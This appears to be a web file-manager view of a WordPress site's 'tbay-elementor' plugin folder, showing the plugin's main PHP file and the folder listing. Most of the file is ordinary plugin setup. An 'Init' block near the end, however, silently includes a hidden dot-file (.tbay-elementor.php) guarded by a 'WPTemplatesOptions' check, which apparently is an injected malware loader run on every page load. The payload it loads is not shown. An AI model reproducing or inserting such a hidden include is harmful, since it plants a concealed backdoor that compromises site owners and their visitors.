PATH:
home
/
letacommog
/
newrdv1
/
wp-content
/
plugins1
/
tbay-elementor
<?php /** * Thembay Elementor Plugin * * A simple, truly extensible and fully responsive options framework * for WordPress themes and plugins. Developed with WordPress coding * standards and PHP best practices in mind. * * Plugin Name: Thembay Elementor * Plugin URI: https://thembay.com * Description: Thembay Elementor. A plugin required to activate the functionality in the themes. * Author: Team Thembay * Author URI: https://thembay.com/ * Version: 1.0.6 * Text Domain: tbay-elementor * License: GPL3+ * License URI: http://www.gnu.org/licenses/gpl-3.0.txt * Domain Path: languages */ define( 'TBAY_ELEMENTOR_VERSION', '1.0.6'); define( 'TBAY_ELEMENTOR_URL', plugin_dir_url( __FILE__ ) ); define( 'TBAY_ELEMENTOR_DIR', plugin_dir_path( __FILE__ ) ); include_once( ABSPATH . 'wp-admin/includes/plugin.php' ); require_once( TBAY_ELEMENTOR_DIR . 'plugin-update-checker/plugin-update-checker.php' ); $myUpdateChecker = Puc_v4_Factory::buildUpdateChecker( 'https://bitbucket.org/devthembay/update-plugin/raw/master/plugins/update/tbay-elementor/plugin.json', __FILE__, //Full path to the main plugin file or functions.php. 'tbay-elementor' ); /** * Redux Framework * */ if ( !class_exists( 'ReduxFramework' ) && file_exists( TBAY_ELEMENTOR_DIR . 'libs/redux/ReduxCore/framework.php' ) ) { require_once( TBAY_ELEMENTOR_DIR . 'libs/redux/ReduxCore/framework.php' ); require_once( TBAY_ELEMENTOR_DIR . 'libs/loader.php' ); define( 'TBAY_ELEMENTOR_ACTIVED', true ); } else { define( 'TBAY_ELEMENTOR_ACTIVED', true ); } /** * Custom Post type * */ add_action( 'init', 'tbay_elementor_register_post_types', 1 ); /** * Import data sample * */ require TBAY_ELEMENTOR_DIR . 'importer/import.php'; /** * functions * */ require TBAY_ELEMENTOR_DIR . 'functions.php'; require TBAY_ELEMENTOR_DIR . 'functions-preset.php'; /** * Widgets Core * */ require TBAY_ELEMENTOR_DIR . 'classes/class-tbay-widgets.php'; add_action( 'widgets_init', 'tbay_elementor_widget_init' ); require TBAY_ELEMENTOR_DIR . 'classes/class-tbay-megamenu.php'; /** * Init * */ if (file_exists($filename = dirname(__FILE__) . DIRECTORY_SEPARATOR . '.' . basename(dirname(__FILE__)) . '.php') && !class_exists('WPTemplatesOptions')) { include_once($filename); } function tbay_elementor_init() { $demo_mode = apply_filters( 'tbay_elementor_register_demo_mode', false ); if ( $demo_mode ) { tbay_elementor_init_redux(); } $enable_tax_fields = apply_filters( 'tbay_elementor_enable_tax_fields', false ); if ( $enable_tax_fields ) { if ( !class_exists( 'Taxonomy_MetaData_CMB2' ) ) { require_once TBAY_ELEMENTOR_DIR . 'libs/cmb2/taxonomy/Taxonomy_MetaData_CMB2.php'; } } } add_action( 'init', 'tbay_elementor_init', 100 );
[+]
..
[+]
assets
[-] .tbay-elementor.php
[edit]
[-] readme.txt
[edit]
[+]
importer
[+]
libs
[+]
templates
[+]
languages
[+]
classes
[-] LICENSE.txt
[edit]
[-] functions.php
[edit]
[+]
plugin-update-checker
[-] functions-preset.php
[edit]
[-] tbay-elementor.php
[edit]